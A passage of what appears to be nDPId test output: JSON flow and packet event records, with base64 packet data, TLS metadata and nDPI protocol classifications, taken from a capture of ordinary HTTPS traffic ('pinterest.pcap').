-00686{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289717548,"flow_last_seen":1605289717548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289717548,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605289717548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717548,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD4AAAAAoAL9ID+FAAACBAWgBAIICjGG9eUAAAAAAQMDBw=="} -00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14613,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717572,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIA0qAcsBIEmLB5kd7IUo3\/YpAbufvovR75juz2g\/oBJXgHfiAAACBAV4AQMDAwQCCArCuS86MYb15Q=="} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14614,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289717572,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD+L0e+ZgBAB+\/vbAAABAQgKMYb1\/cK5Lzo="} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718346,"flow_last_seen":1605289718346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718346,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605289718346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718346,"pkt":"qtsDr8lk5EKm5WPyht1gDn7LACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3mwBu1MbKQQ2nwhTgBBf5ZGnAAABAQgKdGByysK4e5A="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAqmhACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyRABu5dQgwPxqZaUgBAHqUTfAAABAQgKOIhalcK4e5A="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gA2s5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1CQBu69kJZnLb6S2gBAFvhEdAAABAQgKcHSqtcK4e5A="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAtTRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACAK3yoBu80FVZetwjn1gBAB9Q24AAABAQgKVxL7HMK4e4A="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14837,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718372,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbvebDafCFNTGykFgBALfUzsAAABAQgKwrkyWnReVSQ="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14838,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgMAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvfKq3COfXNBVWYgBALvWWfAAABAQgKwrkyYVcQ4ow="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14839,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJEPGplpSXUIMEgBALh6bdAAABAQgKwrkyYTiGPeg="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14840,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUJMtvpLavZCWagBAL1W6tAAABAQgKwrkyYnBykDw="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289720502,"flow_last_seen":1605289720502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289720502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605289720502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720502,"pkt":"qtsDr8lk5EKm5WPyht1gDE+lACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgIBuwZ3AS1n9K5wgBAD7qJGAAABAQgK1mI428K4iuQ="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14888,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720592,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWAmf0rnAGdwEugBAMdPzqAAABAQgKwrk63tZgJbc="} -00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722442,"flow_last_seen":1605289722442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722442,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605289722442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722442,"pkt":"qtsDr8lk5EKm5WPyht1gCa8jACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt0YBu4XaMRXguiMogBAB9ZuaAAABAQgKldeDu8K4iwE="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722610,"flow_last_seen":1605289722610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722610,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605289722610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722610,"pkt":"qtsDr8lk5EKm5WPyht1gDvD\/ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgYBu\/ADYY+SLdnAgBBf+pZ\/AAABAQgK1mJBF8K4kuY="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14891,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3RuC6IyiF2jEWgBAM4PFAAAABAQgKwrlC85XVazg="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14892,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722642,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWBpIt2cDwA2GQgBAQS035AAABAQgKwrlDCNZgKSs="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726574,"flow_last_seen":1605289726574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726574,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605289726574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726574,"pkt":"qtsDr8lk5EKm5WPyht1gD7DqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyPYBuy7xct5PemhygBASWTvxAAABAQgKOIh6ucK4opo="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726582,"flow_last_seen":1605289726582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726582,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605289726582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726582,"pkt":"qtsDr8lk5EKm5WPyht1gBy5HACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKukIBu0Ah3sUn+OyVgBAB9Rf+AAABAQgKqS9zVcK4oqI="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14988,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvI9k96aHIu8XLfgBAL06eYAAABAQgKwrlSlDiGZZ4="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14989,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726637,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6Qif47JVAId7GgBALvHMdAAABAQgKwrlSpKktXm0="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gDHlsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADvvoBu4vV8Grv31OMgBACdmBfAAABAQgK5dFc6cK4oqI="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gCU2wACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnnABu1oBJQ4\/rrWNgBAQLrKDAAABAQgKyRWFssK4oqI="} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14992,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu++u\/fU4yL1fBrgBALkLtnAAABAQgKwrla3eXPQIw="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14993,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbuecD+utY1aASUPgBAZXAuxAAABAQgKwrla48kTaxY="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732959,"flow_last_seen":1605289732959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732959,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605289732959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732959,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7gAAAAAoAL9IOnRAAACBAWgBAIICtZiaYQAAAAAAQMDBw=="} 